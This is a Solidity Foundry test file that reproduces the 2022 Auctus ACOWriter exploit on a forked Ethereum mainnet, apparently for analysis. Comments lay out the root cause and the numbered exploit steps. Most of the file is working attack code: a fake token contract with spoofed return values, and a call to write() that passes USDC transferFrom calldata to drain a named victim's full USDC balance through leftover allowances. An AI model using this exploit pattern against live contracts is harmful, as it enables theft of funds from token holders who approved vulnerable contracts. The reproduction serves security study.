// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
// 2022-03-Auctus PoC analysis file (exploit reproduction)
// Deep manual analysis marks added below. ONLY .sol edits performed.

pragma solidity >=0.7.0 <0.9.0;

import "./../interface.sol";

contract MockACOToken {
    // VULNERABILITY: Untrusted acoToken parameter with no validation or registry check in ACOWriter.write
    // Root cause: write() (and _sellACOTokens) unconditionally treat user-supplied `acoToken` as a trusted IACOToken:
    //   address _collateral = IACOToken(acoToken).collateral();  // line ~100 in ACOWriter.sol
    //   if (_isEther(_collateral)) { IACOToken(acoToken).mintToPayable{value: ...}(msg.sender); }
    //   ...
    //   uint256 acoBalance = _balanceOfERC20(acoToken, address(this));  // staticcall
    //   ...
    //   address token = IACOToken(acoToken).strikeAsset();
    //   _transferERC20(token, msg.sender, ...);
    // No check that acoToken was created by the official ACO factory, no interface verification beyond duck-typing.
    // This lets any contract (here: the attacker itself) spoof returns to steer execution into desired branches.
    // Why it works: collateral()==address(0) selects the ETH branch (msg.value only, no token pull), fake mint/bal/approve/transfer return success values.
    // Impact: attacker gains control of the subsequent arbitrary _exchange.call path while writer holds caller privileges (allowances).
    // EXPLOIT STEPS:
    // 1. Attacker contract implements the IACOToken interface faking collateral()=address(0), strikeAsset()=self, mint/balance/approve/transfer always succeed.
    // 2. See ContractTest.test() below.
    function collateral() public view returns (address) {
        return address(0);
    }

    function mintToPayable(
        address account
    ) external payable returns (uint256) {
        return 1;
    }

    function balanceOf(
        address account
    ) public view returns (uint256) {
        return 1;
    }

    function approve(address spender, uint256 amount) public returns (bool) {
        return true;
    }

    function strikeAsset() public view returns (address) {
        return address(this);
    }

    function transfer(address recipient, uint256 amount) public returns (bool) {
        return true;
    }
}

contract ContractTest is Test, MockACOToken {
    CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
    IACOWriter acowrite = IACOWriter(payable(0xE7597F774fD0a15A617894dc39d45A28B97AFa4f));
    IERC20 usdc = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);

    function setUp() public {
        cheats.createSelectFork("http://127.0.0.1:8545", 14_460_635); // fork mainnet at block 14460635
    }

    function test() public {
        emit log_named_uint("Before exploit, USDC balance of attacker:", usdc.balanceOf(msg.sender));
        // VULNERABILITY: Unrestricted arbitrary external call via exchangeAddress + exchangeData (no whitelist)
        // Detailed: ACOWriter.write uses modifier setExchange(exchangeAddress) which does:
        //   _exchange = exchangeAddress; _; _exchange = address(0);
        // Then unconditionally:
        //   _approveERC20(acoToken, erc20proxy, acoBalance);  // see _sellACOTokens ~line 118
        //   (bool success,) = _exchange.call{value: address(this).balance}(exchangeData);
        //   require(success...);
        //   address token = IACOToken(acoToken).strikeAsset();
        //   ... _transferERC20 or WETH withdraw, then forward any ETH balance
        // Root cause (ACOWriter.sol:90-140): exchangeAddress and exchangeData are attacker-controlled with zero validation or 0x-specific checks.
        // Combined with residual ERC20 allowances: users had previously called `USDC.approve(ACOWriter, X)` to use legit write() for USDC-collateral ACOs (see non-ETH branch: _transferFromERC20 + _approveERC20 to acoToken).
        // The low-level call executes with msg.sender == ACOWriter inside the target (USDC), so transferFrom succeeds for any prior approver.
        // Also note receive() only accepts ETH from _exchange (to protect?), but transferFrom call does not trigger it.
        // Material impact: direct theft of any token for which ACOWriter held a non-zero allowance from any holder.
        // EXPLOIT STEPS:
        // 1. Deploy/ use contract inheriting MockACOToken (fake aco) that spoofs collateral()==0 to take ETH-mint branch with tiny value.
        // 2. Call acowrite.write{value:1}( fakeAco=self, 1, exchangeAddress=USDC, exchangeData=abi.encodeWithSelector(transferFrom.selector, VICTIM_HOLDER, attacker, bal) );
        // 3. Inside write(): collateral()=0 -> mintToPayable{value:1}(msg.sender) [fake, no-op]
        // 4. _sellACOTokens: balanceOf(fake)=1, approve to proxy (on fake), _exchange(=USDC).call(transferFromData) --> executes USDC.transferFrom(VICTIM, attacker, amt) because ACOWriter has allowance from VICTIM.
        // 5. Then strikeAsset()=self -> _transferERC20(fake, msg.sender, 1) [calls transfer on self which succeeds]
        // 6. Any leftover ETH sent to msg.sender. Attacker receives the drained USDC.
        acowrite.write{value: 1}(
            address(this),
            1,
            address(usdc),
            abi.encodeWithSelector(
                bytes4(keccak256(bytes("transferFrom(address,address,uint256)"))),
                0xCB32033c498b54818e58270F341e5f6a3bce993B,
                msg.sender,
                usdc.balanceOf(0xCB32033c498b54818e58270F341e5f6a3bce993B)
            )
        );
        emit log_named_uint("After exploit, USDC balance of attacker:", usdc.balanceOf(msg.sender));
    }
}
